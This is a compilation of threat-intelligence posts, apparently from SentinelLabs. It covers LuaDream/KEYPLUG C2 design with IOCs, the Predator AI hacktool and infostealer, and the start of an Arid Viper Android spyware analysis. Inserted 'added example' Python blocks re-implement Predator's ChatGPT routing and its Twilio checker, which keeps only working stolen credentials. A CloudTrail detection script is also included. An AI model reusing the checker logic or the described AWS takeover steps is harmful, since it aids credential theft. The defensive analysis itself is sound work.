LuaDream is likely still in active development. It remains to be seen whether further iterations of the malware and its plugins will share implementation overlaps, functionality or design patterns with KEYPLUG or other malware strains of suspected Chinese origin.

C2 Protocols

LuaDream and KEYPLUG are highly modular and multi-protocol in design, both implementing support for the HTTP, TCP, WebSocket, and QUIC protocols for C2 communication. The combination of QUIC and WebSocket is a relatively rare backdoor feature and its implementation in both LuaDream and KEYPLUG may be the result of a shared functional requirement by the backdoors’ operators.

The order in which LuaDream and KEYPLUG evaluate the configured protocol among HTTP, TCP, WebSocket, and QUIC is the same: HTTP, TCP, WebSocket, and QUIC in that order. The LuaDream keyword HTTPS2 refers to WebSocket and KEYPLUG implements additional support for UDP. We do not exclude the possibility for future versions of LuaDream to support UDP as well.

LuaDream: Protocol handling

KEYPLUG: Protocol handling

For each protocol, both LuaDream and KEYPLUG implement internal structures that store client data, such as the handles to the established sockets to the C2 servers.

Execution Flow and C2 Data Management

The high-level execution flows of LuaDream and KEYPLUG are very similar. Both backdoors first gather and exfiltrate system and user information in designated functions, with overlaps in gathered information (for example, MAC address, OS version, IP address, computer name, and username).

LuaDream and KEYPLUG then instantiate threads designated for sending and receiving C2 data, establish connection to the C2 server, and continue to process backdoor commands and manage plugins. Plugin management includes loading and unloading plugins.

The backdoors use global data buffers designated for storing data to be sent to the C2 server, and data received from the server. LuaDream and KEYPLUG read from the global buffers that store incoming C2 data and continue processing it when available.

LuaDream and KEYPLUG store in designated internal structures overlapping information about the global buffers, such as starting memory addresses, sizes, and pointers to Windows CRITICAL_SECTION structures. LuaDream defines this structure as _MEM_DATA_CACHE_.

LuaDream: Global buffer structure (decompiled LuaJIT bytecode)

KEYPLUG: Global buffer structure (IDA-defined structure)

LuaDream and KEYPLUG implement designated functions for reading from, and writing to, these buffers. These functions synchronize buffer access by multiple threads using Windows Critical Sections.

LuaDream: Reading C2 data from a global buffer

KEYPLUG: Reading C2 data from a global buffer

Throughout their execution, both LuaDream and KEYPLUG generate one-time integer values based on the system uptime returned by the GetTickCount function. The backdoors calculate these values by applying modulo and/or addition operations to the system uptime. Some overlapping uses of the generated values are as sleep time intervals or protocol-specific keys, such as the Sec-WebSocket-Key packet header field that is used in the WebSocket opening handshake.

LuaDream: Sleep interval

KEYPLUG: Sleep interval

Conclusions

We assess that there are strong overlaps in operational infrastructure, targeting, and TTPs associating the Sandman APT with China-based adversaries using the KEYPLUG backdoor, STORM-0866/Red Dev 40 in particular. This highlights the complex nature of the Chinese threat landscape. Its constituent threat actors will almost certainly continue to cooperate and coordinate, exploring new approaches to upgrade the functionality, flexibility, and stealthiness of their malware. The adoption of the Lua development paradigm is a compelling illustration of this.

Navigating the threat landscape calls for continuous collaboration and information sharing within the threat intelligence research community. SentinelLabs remains committed to this mission and is grateful to our industry partners involved in this collective endeavor.

Indicators of Compromise

Domains

dan.det-ploshadka[.]com KEYPLUG C2 server
mode.encagil[.]com LuaDream C2 server
ssl.articella[.]com Suspected KEYPLUG or LuaDream C2 server
ssl.e-novauto[.]com KEYPLUG C2 server
ssl.explorecell[.]com LuaDream C2 server
yum.luxyries[.]com KEYPLUG C2 server

IP Addresses

146.70.157[.]20 KEYPLUG C2 server (based on known C2 certificates)
172.67.216[.]63 KEYPLUG C2 server
185.38.142[.]129 KEYPLUG C2 server (based on a known C2 certificate)
185.51.134[.]27 LuaDream and KEYPLUG C2 (based on known C2 certificates)
185.82.218[.]230 LuaDream C2 server
37.120.140[.]205 KEYPLUG C2 server (according to a known C2 certificate)
45.129.199[.]122 KEYPLUG C2 server (based on a known C2 certificate)
45.80.148[.]151 LuaDream C2 (based on a known C2 certificate)
45.90.59[.]17 KEYPLUG C2 server (according to a known C2 certificate)
5.2.67[.]176 KEYPLUG C2 server (based on a known C2 certificate)
5.2.72[.]130 KEYPLUG C2 server (based on a known C2 certificate)
5.255.88[.]188 KEYPLUG C2 server (based on a known C2 certificate)
79.110.52[.]160 KEYPLUG C2 server

Certificate Thumbprints

a7932112b7880c95d77bc36c6fcced977f4a5889 KEYPLUG C2
b6d759c9ea5d2136bacb1b2289a31c33500c8de8 KEYPLUG C2
fc8fdf58cd945619cbfede40ba06aada10de9459 LuaDream C2

LABScon Replay | The Cyber Arm of China’s Soft Power: Reshaping a Continent

By: LABScon
6 December 2023 at 13:04

In his keynote at LABScon23, SentinelLabs’ Principal Threat Researcher Tom Hegel addressed a crucial but often overlooked aspect of global cybersecurity: cyber threat activity in less-monitored regions, particularly Africa.

Focusing on China’s strategic use of soft power across the African continent, Hegel provides a compelling analysis of how technology and investments are wielded as tools of influence and control.

Highlighting its significant investments in key sectors, Hegel explores how China has established strategic influence in African telecommunications, finance, and surveillance sectors and the implications this has for cybersecurity.

While noting that such investments are attractive to African countries for their undoubted benefits, the talk raises concerns about the trade-offs. In telecommunications, Chinese firms like Huawei and ZTE can be linked to potential cases of surveillance and control, evidenced by actions like internet clampdowns in Zimbabwe during politically sensitive times. In finance, an intricate web of financial engagements provides worrying opportunities for cyber espionage. Initiatives like the Safe City projects bring technological advancements, but at the potential price of civil and political surveillance.

Hegel concludes with a call to action for the cybersecurity community. The importance of collaborative efforts in monitoring and understanding the cyber activities in these regions is essential not only for the direct protection of entities in undermonitored areas but also for a broader understanding of the global cyber threat landscape.

Connecting the dots between regional cybersecurity issues in Africa and their global repercussions, this talk advocates for a more inclusive view of global cyber threats, highlighting the need for a unified and informed response from the cybersecurity community.

Watch below to see the full talk. Read the accompanying research paper for an even deeper dive.

About the Presenter

Tom Hegel is a Principal Threat Researcher with SentinelOne. He comes from a background of detection and analysis of malicious actors, malware, and global events with an application to the cyber domain. His past research has focused on threats impacting individuals and organizations across the world, primarily targeted attackers.

About LABScon

This presentation was featured live at LABScon 2023, an immersive 3-day conference bringing together the world’s top cybersecurity minds, hosted by SentinelOne’s research arm, SentinelLabs.

Decoding the Past, Securing the Future | Enhancing Cyber Defense with Historical Threat Intelligence 

By: Tom Hegel
28 November 2023 at 14:28

Organizational defenders today face unprecedented pressure to keep up with a relentless stream of new attacks. No sooner is the latest campaign discovered, its indicators shared, and defenses bolstered than we are on to the next one. The details of these attacks are added to our collective historical record, but most defenders rarely have the time or motivation to reconsider what further value they might offer.

However, mining historical data for insight into tomorrow’s attacks is, we would argue, an undervalued resource. From expanding our list of known indicators and developing better threat intelligence to improving our understanding of attribution and providing new discoveries, investigating historical data is an asset that cyber defenders can and should make more of.

In this post, we explore practical ways that revisiting past cyber incidents can empower defenders and help to anticipate future threats more effectively.

1. Exploring the Past to Expand Actionable Threat Intelligence

In September of 2023, SentinelLabs observed a new threat activity cluster by a previously unknown threat actor we dubbed Sandman. The threat actor deploys malware utilizing the LuaJIT platform, a development paradigm relatively rarely seen in the cyberespionage domain, but which has a historical association with suspected Western or Western-aligned advanced threat actors.

Early last year, SentinelLabs released a report on a new cyber threat actor we named ModifiedElephant. This research was the conclusion of an investigation into an unknown offensive threat actor responsible for targeted attacks on human rights activists, human rights defenders, academics, and lawyers across India with the objective of planting incriminating digital evidence. Our analysis identified that ModifiedElephant has been operating since at least 2012 and continued to operate as of the report.

Timeline sample of ModifiedElephant and SideWinder C2 Infrastructure

So why does this matter? Cyber paleontology allows us to take a small bit of knowledge of targeted intrusions, and expand it into hundreds of indicators of compromise, such as malware samples and unique infrastructure. In the case of ModifiedElephant, we tied the threat actor to hundreds of other intrusion attempts across the globe. This research found activity spread across nearly a decade, targeting individuals and organizations alike.

The IOC set has been greatly expanded, which allows us to improve the defenses of those who were originally targeted and of others who may be targeted in the future. Had we simply stopped researching the threat actor after the initial, smaller case of a handful of intrusions against individuals, our perception of this actor would have remained that of an interesting but, to most, irrelevant one. Revisiting a decade of activity instead lets us understand the actor and produce actionable intelligence for direct network defense needs.

2. Developing Better Strategic Threat Intelligence

Pushing past directly actionable intelligence such as malware samples, IOCs, and threat detection rules, we can also gain new strategic intelligence on threat actors. Specifically, our perspective of known threat actors can alter greatly when we review past intrusions.

For example, in September we reported and presented at LABScon the topic of China’s soft power agenda throughout Africa. In this research, we shared how Chinese attributed APTs, such as “Backdoor Diplomacy”, have been linked to a previously-reported set of intrusions across South Africa, Kenya, Senegal, and Ethiopia in the past few years.

Revisiting previously reported infrastructure associated with the threat actor opened our eyes to a wider set of targets in these countries, including targets we had not observed before, such as financial organizations. Today, we can use this expanded understanding of the threat actor to apply strategic intelligence for financial organizations and for the countries newly observed to be of interest to the attacker.

Applying the same approach to other high-interest threat actors, questioning our past assessments and intelligence, would be a valuable way to expand defensive capabilities and context today.

3. Enhancing Our Understanding of Attribution

An additional value which can come from a fresh review of historical threat activity concerns attribution – the process of identifying the true attacker behind an activity.

Past intrusions can become clearer once we understand who the attacking entity actually was, or which threat actor cluster some previously unknown activity now falls under. For example, in August we identified malware with a long history of use by a variety of suspected Chinese clusters, along with infrastructure targeting Southeast Asia’s gambling sector, related to previous activities attributed to BRONZE STARLIGHT, a Chinese threat actor whose main goal appears to be espionage rather than financial gain.

In addition, we recently reported on the Appin hack-for-hire business in India and how unconfirmed and mysterious activity from years back can finally be attributed to it. This includes Operation Hangover, the well-known industrial espionage case, and the targeting of human rights defenders with custom Mac malware.

C2 / Delivery Server bluecreams[.]com and Linked Malware Visualized

Knowing that these sets of activity tie back to a central organization allows renewed understanding and interest in the hack-for-hire threat actor industry. Additionally, and perhaps more importantly, this provides victims with an opportunity to hold attackers responsible for their actions, if desired.

4. Newer Techniques Offer Fresh Insights From Old Data

Using today’s technology to expand past context and knowledge of attackers is also increasingly valuable to modern defenders. The technology sector evolves at a blistering pace, and new research tools often arrive to provide new capabilities.

Although much recent focus has been on adopting and adapting LLMs and generative AI for various infosec tasks, we can also see examples of existing technologies that continue to develop and push the boundaries of what is possible.

One of the best examples of this is YARA, today’s go-to tool for writing malware description rules used to hunt for files of interest, such as malware samples. YARA continues to be developed in ways that can yield new discoveries from old datasets. New rule-writing methods, combined with major malware repositories such as Stairwell and VirusTotal, can lead to the discovery of leaked attacker files, changes within targeted malware families, and uploads of never-before-seen malware from past attacks.

Combining new discoveries with other tools for tracking infrastructure, like SilentPush, it is possible to make similar high interest discoveries centered around old attacker infrastructure.

Conclusion

As we move forward, it’s important not to lose sight of the past. As many of our research examples highlighted above show, retrospective analyses can wring new actionable intelligence from the raw data of past breaches and help to preempt future attacks.

We encourage other analysts to join us in connecting the dots between what was known, what was overlooked, and what can be learned, taking advantage of the insights that new technologies and methods afford us. Historical data isn’t just an academic record of what went before, but a resource we must mine to craft a more resilient and responsive cybersecurity posture.

Elephant Hunting | Inside an Indian Hack-For-Hire Group

By: Tom Hegel
16 November 2023 at 16:19

Editor’s Note:

SentinelOne has temporarily removed the article “Elephant Hunting | Inside an Indian Hack-For-Hire Group” on Dec 22, 2023 in light of a pending court order and is doing so out of an abundance of caution. SentinelOne stands by its findings and was transparent about the evidence it gathered to support its findings. Those findings were based on many hours of research and verified sources and we are closely following the pending legal action. All rights reserved

Predator AI | ChatGPT-Powered Infostealer Takes Aim at Cloud Platforms

7 November 2023 at 15:13

Executive Summary

  • SentinelLabs has identified a new Python-based infostealer and hacktool called ‘Predator AI’ that is designed to target cloud services.
  • The Predator AI developer implemented a ChatGPT-driven class into the Python script, which is designed to make the tool easier to use and to serve as a single text-driven interface between disparate features.
  • These advancements are not production ready, but demonstrate that actors can realistically use AI to improve their workflows by automating data enrichment and adding context to scanner results.

Background & Distribution

Predator AI is advertised through Telegram channels related to hacking. The main purpose of Predator is to facilitate web application attacks against various commonly used technologies, including content management systems (CMS) like WordPress, as well as cloud email services like AWS SES. However, Predator is a multi-purpose tool, much like the AlienFox and Legion cloud spamming toolsets. These toolsets share considerable overlap in publicly available code that each repurposes for their brand’s own use, including the use of Androxgh0st and Greenbot modules.

Predator is an actively developed project. In September 2023, a member of the primary Telegram channel inquired about Predator adding a Twilio account checker, to which the developer replied they could deliver in about 2 weeks. In October, the developer posted an update showing the new Twilio checking feature. The version we analyzed has Twilio features, which suggests it is a recent build.

At the top of the script, there is a message from the developer which states that the tool is protected by copyright law. The message also has a disclaimer saying the tool is for educational purposes and the author does not condone any illegal use.

Developer’s message at the top of the Predator script

Targeting & Technical Details

Predator is a Python application with over 11,000 lines. The application runs entirely through a Tkinter-based graphical user interface (GUI): there is no standalone command line interface (CLI) mode, which distinguishes Predator from many similar tools. The Tkinter approach requires several JSON configuration files.

Predator GUI

The script has 13 global classes defined, which roughly segment the different features.

Class Name | Details
Predator | The largest class. Spans from the beginning of the script to line 7079.
Settings | Only two lines. Sets the UpdatesCheck variable to False and Password to “Predator123”.
Utility | Calls Windows commands to get the current window name and to check whether the current user is running as an administrator.
PumperSettings | Code that inflates the size of a file.
FakeErrorBuilder | Creates fake error messages that pertain to XSS testing on a Windows system.
StealerBuilder | Builds a configurable infostealer as a Windows Portable Executable (PE).
Translator | Translates the dialog boxes and menu items rendered in the Tkinter GUI. Supported languages are Arabic, English, Japanese, Russian, and Spanish.
NetGun | Handles web application security scans with options for proxies and custom wordlists.
CTkMessagebox & CTkListbox | Code that renders the graphical user interface (GUI) via Tkinter.
ThemeMaker | Custom color schemes for the GUI.
GPTj | A ChatGPT-enabled class. Queries the OpenAI API.
NetXplorer | Uses the psutil and subprocess modules to query network status and system information.

Predator has features that can be used to attack many popular web services and technologies, including:

Service | Provider Details | Based In
Aimon | SMS marketing | Italy
Amazon Web Services (AWS) Simple Email Service (SES) | Email platform | United States
Aruba | Hosting | Italy
Clickatell | SMS marketing | South Africa, United States
ClickSend | SMS marketing | Australia
Twilio | SMS, Voice, Video communications | United States
Nexmo | Voice & SMS, acquired by Vonage | United States
OneSignal | SMS, Push Notifications | United States, United Kingdom
Openpay | Buy Now, Pay Later; ceased operations in February 2023 | Australia
PayPal | Live environment & Sandbox API keys targeted | United States
Plivo | Voice & Messaging | United States
Razorpay | Payment Processor | India
Skebby | SMS Marketing | Italy
Stripe | Payment Processor | United States
Telnyx | Voice, Messaging, Fax | United States
Textlocal | SMS Marketing | United Kingdom
Valueleaf | Marketing | India
XGATE | Marketing & CRM | Hong Kong

Predator’s web application attacks look for common weaknesses, misconfigurations, or vulnerabilities: Cross-Origin Resource Sharing (CORS) misconfiguration, exposed Git configuration, PHPUnit remote code execution (RCE), SQL injection, and cross-site scripting (XSS).

The following technologies are targeted:

  • Drupal
  • Joomla
  • Laravel
  • Magento
  • OpenCart
  • osCommerce
  • PrestaShop
  • vBulletin
  • WordPress

Variables that hold output from web service scanning features

Laravel environment parsing

Predator AI | The GPTj Class

The GPTj class contains the ‘Predator AI’ feature, which is a chat-like text processing interface that connects the user to Predator’s features. The actor designed Predator AI to try to find a local solution first before querying the OpenAI API, which reduces the API consumption.

This class searches the user’s input for strings associated with a known use case centered around one of Predator’s web application and cloud service hacking tools. There are more than 100 cases where Predator handles the data internally or through a free third-party service, such as an IP reputation lookup service. This class contains several partially implemented utilities related to AWS SES and Twilio, as well as utilities to get information about IP addresses and phone numbers.

Predator queries the ChatGPT API only when no local case handles the input. Several driving functions defined inside this class handle the activity flow or enable ChatGPT interaction:

generate_text

This function requires two arguments: prompt and api_key. The function uses the OpenAI model text-davinci-003 with a maximum token length of 400 and temperature 0.7. The code makes a POST request to https://api.openai.com/v1/completions and returns the result for handling via the Tkinter UI.

generate_text function in GPTj class

Ai_Backend

This function takes one argument, usrMsg. This code contains the hardcoded OpenAI API key and calls the generate_text function on the usrMsg object with the API Key. The OpenAI server response is returned.

aiRes

This function takes two arguments, msg and patch. It only calls Ai_Backend, and therefore OpenAI, when the patch argument is equal to 0 or not given. Predator has 106 references to aiRes, and each reference passes a patch value that should not equal 0. The OpenAI functionality is therefore designed to handle edge cases that the script does not natively handle. The function checks whether a patch is present and adjusts the UI result based on the length of the response, whether it came from OpenAI or from the patched result.

ChatEvent

This function contains the modular utilities offered by the class. It takes no arguments.

ChatEvent function’s help message highlights the different utilities it offers

When the user command is not routed to ChatGPT, several functions handle the request locally or through alternate API calls. We break them down by category.
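The local-first dispatch described for aiRes and ChatEvent, reconstructed as an added example (this is illustrative code written for this page, not Predator’s own source): known inputs are matched against a keyword table and answered by a local handler, which is passed to aiRes as a non-zero patch; only unmatched input reaches the remote completion backend. The keyword table, the two handlers and the offline stand-in backend are assumptions chosen to show the pattern.

```python
import re

# Hypothetical keyword table and handlers; not the tool's own code.
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# Twilio account SIDs are "AC" followed by 32 hex characters.
TWILIO_SID = re.compile(r"\bAC[0-9a-fA-F]{32}\b")


def handle_ip(msg):
    ips = IPV4.findall(msg)
    return ("ip lookup queued for: " + ", ".join(ips)) if ips else "no IPv4 address found"


def handle_twilio(msg):
    sids = TWILIO_SID.findall(msg)
    return ("twilio check queued for SID(s): " + ", ".join(sids)) if sids else "no Twilio SID found"


# (keyword, handler): the first matching keyword wins, so order matters.
LOCAL_CASES = [
    ("twilio", handle_twilio),
    ("abuse", handle_ip),
    ("ip", handle_ip),
]


class Router:
    """Mirror of aiRes(msg, patch): a non-zero patch is a locally computed answer."""

    def __init__(self, remote):
        self.remote = remote        # callable(prompt) -> str, stands in for Ai_Backend
        self.remote_calls = 0       # the metered resource the operator wants to minimise

    def chat_event(self, user_input):
        # Whole-word matching avoids "ip" firing on words such as "script".
        words = set(re.findall(r"[a-z]+", user_input.lower()))
        for keyword, handler in LOCAL_CASES:
            if keyword in words:
                return self.ai_res(user_input, patch=handler(user_input))
        return self.ai_res(user_input, patch=0)

    def ai_res(self, msg, patch=0):
        if patch != 0:
            return patch
        self.remote_calls += 1
        return self.remote(msg)


def offline_backend(prompt):
    # Stand-in for generate_text so the example runs without an API key.
    return f"[remote completion for: {prompt!r}]"


if __name__ == "__main__":
    router = Router(offline_backend)
    for line in ("check ip 203.0.113.7 for abuse", "what does this tool do"):
        print(router.chat_event(line))
    print("remote calls:", router.remote_calls)
```

The remote_calls counter is the point: with a hundred-odd patched cases in front of it, the paid API is only reached by input the author did not anticipate, which is also where the tool is least predictable.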

AWS Features

Though the core utility is present, not all of the following functions are called inside the script, suggesting the developer is still working on these features. This code has significant overlap with AlienFox, Legion, and other earlier iterations of these tools. Based on what is currently in the script, there is no indication that AWS-related data would be sent to the ChatGPT service. Instead, the script parses the input for the presence of aws.c and calls the following functions when present.

If these features were fully implemented, the attacker could use them to perform the following when they have valid AWS account credentials:

  • Check for all email accounts in an AWS SES environment.
  • Check send quotas.
  • Create a new account, assign administrative privileges, and delete the old account.

TwilioChecker

This function queries https://api.twilio.com/2010-04-01/Accounts.json with SID and token as arguments. If "message":"Authenticat" is not in the response, the script parses the response for the fields status, type, and balance. If “status” is not in the response, the script parses the response for balance and currency fields. If status returns as active, the script logs the values of SID, TOKEN,  TYPE,  STATUS,  BALANCE to the file Result/TwilioChecker/result.txt.
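The response handling just described, reproduced as an added example so the branches can be checked offline (this is illustrative code, not the tool’s own). The three sample bodies are constructed to exercise each branch and are not copies of Twilio’s real API output; the result line format is an assumption.

```python
import json

# Constructed sample responses (not real Twilio output), one per branch.
REJECTED = '{"code":20003,"message":"Authenticate","status":401}'
ACTIVE_FULL = '{"status":"active","type":"Full","balance":"12.50"}'
SUSPENDED = '{"status":"suspended","type":"Trial","balance":"0.00"}'
NO_STATUS = '{"balance":"3.10","currency":"USD"}'


def parse_twilio_check(body):
    """Return None when the credentials are rejected, else the fields the tool keeps.

    The rejection test is the literal substring check described above: it only
    fires when the JSON carries no whitespace after the colon.
    """
    if '"message":"Authenticat' in body:
        return None
    data = json.loads(body)
    if "status" in data:
        return {"status": data.get("status"), "type": data.get("type"),
                "balance": data.get("balance")}
    return {"balance": data.get("balance"), "currency": data.get("currency")}


def result_line(sid, token, parsed):
    """Entry for Result/TwilioChecker/result.txt; None unless the account is active."""
    if not parsed or parsed.get("status") != "active":
        return None
    return (f"SID={sid} TOKEN={token} TYPE={parsed['type']} "
            f"STATUS={parsed['status']} BALANCE={parsed['balance']}")


def check_captured(pairs_and_bodies):
    """Run the parse and log steps over (sid, token, body) triples."""
    lines = []
    for sid, token, body in pairs_and_bodies:
        line = result_line(sid, token, parse_twilio_check(body))
        if line:
            lines.append(line)
    return lines


if __name__ == "__main__":
    for line in check_captured([("ACexample1", "tok1", ACTIVE_FULL),
                                ("ACexample2", "tok2", REJECTED),
                                ("ACexample3", "tok3", SUSPENDED)]):
        print(line)
```

Two things stand out when the logic is run: only credentials that come back active are written to disk, so the result file is a list of working accounts, and a pretty-printed error body slips past the substring check and is parsed as if it were a valid account.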

GhostTrack

There are several other utilities nested under a function named GhostTrack.

  • IP_Track: Collects information about a given IP address via the ipwho[.]is service.
  • phoneGW: Uses the phonenumbers Python module to format input phone numbers in a standard way and check information about the phone number, such as whether it is a landline or mobile number.
  • TrackLu: Checks one of 23 social media services for a username matching the input argument. The function checks for a 200 status code, which is not effective in the case of private profiles and there are likely many site-specific edge cases.
  • checkIP: Queries api.abuseipdb[.]com to collect information about the given IP address related to abuse metrics, such as an abuse confidence score.

The author included several conditions to handle a user query about the nature of the chat utility, along with a statement that claims the author spent three days developing this feature.

Message inside GPTj class

A query given through the Predator AI interface and the response from ChatGPT fed into the UI

StealerBuilder

This class contains configuration variables to build an infostealer. On October 16 2023, the project developer posted a video about Predator that shows the Stealer build process. A user asked if the resulting executable is fully undetectable, to which the developer replied, “Of course.”

The stealer can be configured to use Discord or Telegram webhooks for C2. The operator can specify an existing executable to insert the infostealer code into. During testing, we were unable to successfully use this feature as the required configuration files were not available. The features visible in the script we analyzed indicate that Predator parses files from a Scripts directory and uses those to build either a Windows Portable Executable (PE) file or a Python script version of the stealer module.

StealerBuilder configuration variables

Conclusion

The discovery of Predator AI is an entirely expected evolution that had not previously been documented in the hacktool space. Since the recent wave of AI technologies became publicly available, security professionals have questioned whether this technology was already aiding threat actors and how it could be used to scale actor operations. Several projects, like BlackMamba, ultimately delivered less than their hype suggested. Predator AI is a small step forward in this space: the actor is actively working on making a tool that can utilize AI.

While Predator AI is likely somewhat functional, this integration does not substantially increase an attacker’s capability. The feature has not yet been advertised on the actor’s Telegram channel, and there are likely many edge cases that make it unstable and potentially expensive.

As with other cloud service attack tools, organizations can reduce the impact of Predator by keeping web services patched and up to date, and by restricting internet exposure to what is necessary. Use cloud security posture management (CSPM) tools to validate that configurations are secure. Consider dedicated logging and detections for anomalous behaviors on cloud service provider (CSP) resources, such as a new user account being added and another user account being deleted immediately afterward.
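The create-account, grant-admin, delete-account sequence listed under AWS Features is the behaviour the logging advice above is meant to catch. The following is an added detection example written for this page, not code from the post or from any vendor product: it runs over constructed CloudTrail-style records (field layout as CloudTrail emits it, every value made up; the created user name reuses the “Kontolz” string from the IOCs) and flags one principal performing all three steps inside a short window.

```python
import json
from datetime import datetime, timedelta

# Constructed CloudTrail-style records; all ARNs, names and times are made up.
SAMPLE_EVENTS = [
    {"eventTime": "2023-10-16T12:00:05Z", "eventName": "CreateUser",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:user/ses-sender"},
     "requestParameters": {"userName": "Kontolz"}},
    {"eventTime": "2023-10-16T12:00:09Z", "eventName": "AttachUserPolicy",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:user/ses-sender"},
     "requestParameters": {"userName": "Kontolz",
                           "policyArn": "arn:aws:iam::aws:policy/AdministratorAccess"}},
    {"eventTime": "2023-10-16T12:00:41Z", "eventName": "DeleteUser",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:user/ses-sender"},
     "requestParameters": {"userName": "ses-sender"}},
    # Benign: an administrator creates a user and nothing else follows.
    {"eventTime": "2023-10-16T13:15:00Z", "eventName": "CreateUser",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:user/iam-admin"},
     "requestParameters": {"userName": "new-hire"}},
]

ADMIN_POLICY_SUFFIX = "/AdministratorAccess"


def _ts(event):
    return datetime.strptime(event["eventTime"], "%Y-%m-%dT%H:%M:%SZ")


def _grants_admin(event, new_user):
    """True when the event hands the freshly created user elevated rights."""
    rp = event.get("requestParameters") or {}
    if rp.get("userName") != new_user:
        return False
    if event["eventName"] == "AttachUserPolicy":
        return rp.get("policyArn", "").endswith(ADMIN_POLICY_SUFFIX)
    # Inline policies and group membership can grant the same; flag them too.
    return event["eventName"] in ("PutUserPolicy", "AddUserToGroup")


def find_privilege_handoffs(events, window=timedelta(minutes=10)):
    """Flag CreateUser -> admin grant to that user -> DeleteUser of a different
    user, all performed by one principal within `window`."""
    by_actor = {}
    for ev in sorted(events, key=_ts):
        by_actor.setdefault(ev["userIdentity"]["arn"], []).append(ev)

    findings = []
    for actor, evs in by_actor.items():
        for i, ev in enumerate(evs):
            if ev["eventName"] != "CreateUser":
                continue
            new_user = ev["requestParameters"]["userName"]
            granted = False
            for later in evs[i + 1:]:
                if _ts(later) - _ts(ev) > window:
                    break
                if _grants_admin(later, new_user):
                    granted = True
                    continue
                deleted = (later.get("requestParameters") or {}).get("userName")
                if later["eventName"] == "DeleteUser" and granted and deleted != new_user:
                    findings.append({
                        "actor": actor,
                        "new_user": new_user,
                        "deleted_user": deleted,
                        # The compromised identity removing itself after the handoff.
                        "self_delete": actor.endswith("/" + deleted),
                        "seconds": int((_ts(later) - _ts(ev)).total_seconds()),
                    })
                    break
    return findings


if __name__ == "__main__":
    print(json.dumps(find_privilege_handoffs(SAMPLE_EVENTS), indent=2))
```

Grouping by the calling principal rather than by the affected user is deliberate: the leaked key that ran the tool is the common thread across all three API calls, and the self_delete flag captures the case where that identity is the one removed.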

Indicators of Compromise

SHA-1 Hash

88d40f86eefee5112515b73cce2d2badb7f49ffd – main.py Predator Python script

Hardcoded Strings

  • “jSDSgnditikunggobloktolol” – hardcoded AWS account name string
  • “titid” – hardcoded username in AWS GPT functionality
  • “Adminn” – hardcoded username in AWS GPT functionality
  • “Predator123” – hardcoded password from the Settings class
  • “admainkontolpaslodsajijsd21334#1ejeg2shehhe” – hardcoded password for ‘Kontolz’ user account
  • arn:aws:iam::320406895696:user/Kontolz – example ARN for Kontolz user

Arid Viper | APT’s Nest of SpyC23 Malware Continues to Target Android Devices

6 November 2023 at 16:13

Executive Summary

  • Arid Viper is an espionage-motivated cyber threat actor with Hamas-aligned interests. Arid Viper’s toolkit is multi-platform and includes the consistent use and development of mobile spyware since emerging in 2017.
  • Through 2022 and 2023, the actor has distributed SpyC23, an Android spyware family, through weaponized apps posing as Telegram or as a dating app called Skipped.
  • There are overlaps between recent SpyC23 versions and their 2017 predecessors, tying together several Arid Viper Android malware families.
  • Increased industry focus on Arid Viper is an extension of our continuing collective efforts to track threat actors engaged in the Israeli-Hamas war. In this context, traditional cyberespionage activities are often enablers for on-the-ground operations and deserve additional scrutiny.

Background

The Arid Viper group has a long history of using mobile malware, including at least four Android spyware families and one short-lived iOS implant, Phenakite. The SpyC23 Android malware family has existed since at least 2019, though shared code between the Arid Viper spyware families dates back to 2017. It was first reported in 2020 by ESET in a campaign where the actor used a third-party app store to distribute weaponized Android packages (APK). That campaign featured several apps designed to mimic Telegram and Android application update managers.

Through 2022 and early 2023, Arid Viper developed several newer SpyC23 versions that share these themes: two apps mimic Telegram, while another is internally called APP-UPGRADE but is based on a romance-themed messaging app called Skipped Messenger. Cisco Talos recently reported on the history of Skipped Messenger, revealing that the once-benign dating application was likely passed from the original developer to the Arid Viper actor.

SentinelLabs compared these newer versions of SpyC23 to the earlier 2020 version, as well as several older Android spyware families associated with Arid Viper: GnatSpy, FrozenCell, and VAMP. Many changes have been made in SpyC23’s development; however, there are notable overlaps with these older families and the taxonomy is less distinct.

App Analysis

The theme of these applications centers on messaging and communications. We identified two unique themes: one mimics Telegram, the other mimics an apparent dating-themed app called Skipped Messenger. The group has previously relied on Telegram-themed messengers as well as romance-themed lures and apps.

Arid Viper often relies on social engineering to deliver malware, using pretexts that let operators engage more closely with their intended victims. The social engineering approach is a boon for delivering Android malware, as there are many hurdles for the actor to overcome before a user successfully installs a malicious app. Working the installation flow into a social engineering pretext is likely more effective than expecting users to install spyware successfully without prompting.

There is a non-weaponized version of Skipped Messenger (SHA-1: 6e1867bd841f4dc16bef21b5a958eec7a6497c4e) that shares the same Firebase service hostname skippedtestinapp[.]firebaseio[.]com as the malicious version. As the Talos report noted, Skipped was originally a legitimate dating app. The Google Play store version was last updated in August 2021.

Skipped Messenger & Telegram app main screen

Like most malicious Android apps, these apps ask the user to enable permissions that facilitate spyware activities.

Skipped Messenger screens prompting the user to enable Accessibility features

The application permissions give a high degree of control over the device, including:

  • Accessing the phone’s location
  • Making calls without user interaction
  • Monitoring calls made by the user
  • Recording with the microphone, capturing audio output
  • Read & Write to storage
  • Read & Write to the Contacts list
  • Modifying network state
  • Collecting a list of accounts used on the device
  • Downloading files to the phone without user interaction
  • Launching Java archive (JAR) files as a Service
  • Reading notifications received on the device as well as any connected wearables

The developer employed anti-decompilation and anti-virtualization techniques to complicate analysis. Each of these APKs contains application code that is obfuscated. On emulated Android devices, the apps flash and repeatedly cycle through prompts even after the requested permissions have been granted.

Comparing these new versions with older SpyC23 variants, there is significant overlap in package names, which fortifies the relationship between the old and new versions. In the image below, the older version on the left houses malicious activity in the update.bbm package, and the version we discovered on the right houses similar subpackages in the apps.sklite.pacJava package.

Java subpackage names: SpyC23 2020 (left) and APP-UPGRADE APK 2023 (right)

The overlaps continue in the class names. The actor frequently names classes after people’s names, as outlined in the rc_cola/tas_ran_rc_col package structure.

Java class names: SpyC23 2020 (left) and APP-UPGRADE APK 2023 (right)

These applications are quite large, making analysis of each class impractical. Instead, we will focus on several interesting classes and methods.

ACCAPPService

This class handles some communications to the C2. Of note, the class contains code that pertains to the user uninstalling the application. The SendToServerTask subclass logs when the user is in a ‘dangerous’ menu and parses input containing the active menu name for the English words ‘apps’ or ‘applications’ as well as the Arabic word for ‘Applications’.

“User In Dangerous Menu” logging messages

Brodie

